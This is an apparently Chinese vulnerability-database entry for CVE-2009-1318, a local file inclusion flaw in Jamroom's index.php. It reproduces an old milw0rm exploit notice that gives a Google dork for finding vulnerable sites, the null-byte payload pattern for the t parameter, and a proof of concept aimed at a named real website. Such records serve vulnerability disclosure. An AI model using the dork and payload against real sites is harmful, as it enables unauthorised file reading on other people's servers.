Jamroom 'index.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117583 漏洞类型 路径遍历
发布时间 2009-04-14 更新时间 2009-04-17
CVE编号 CVE-2009-1318 CNNVD-ID CNNVD-200904-359
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/8423
https://cxsecurity.com/issue/WLB-2009040191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-359
|漏洞详情
Jamroom3.1.2,3.2.3到3.2.6版本,4.0.2以及3.4.0之前的其他版本中的index.php存在目录遍历漏洞。远程攻击者可以借助t参数中的目录遍历序列,包含任意文件。
|漏洞EXP
[o]-----------------------------------------------------------------------------------------------------------------[x]
 |  Local File Include Vulnerability                                                    |
[o]------------------------------------------------------------------------------------[o]
 |  Software : Jamroom version 3.1.2 , 3.2.3 , 3.2.4 , 3.2.5 , 3.2.6 , 4.0.2            |
 |  Vendor   : www.jamroom.net                                                          |
 |  Date     : 12 March 2009                                                            |
 |  Author   : zxvf                                                                     |
 |  Contact  : yuvant2blue@yahoo.co.id                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    "Powered by Jamroom"

[»] Exploit

    http://[site]/index.php?t=[LFI]%00

[»] Proof of Concept

    http://www.earplugradio.com//index.php?t=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  c0li, OoN_Boy, pizzyroot, H312Y, eminem, xx_user, NoGe                              |
 |  Armageddon Team, avatar team, and all indonesian hacker!                            |
 |  BeHave oR BeGone !!!                                                                |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-14]
|参考资料

来源:XF
名称:jamroom-index-file-include(49869)
链接:http://xforce.iss.net/xforce/xfdb/49869
来源:BID
名称:34511
链接:http://www.securityfocus.com/bid/34511
来源:MILW0RM
名称:8423
链接:http://www.milw0rm.com/exploits/8423
来源:www.jamroom.net
链接:http://www.jamroom.net/index.php?m=td_tracker&o=view&id=1470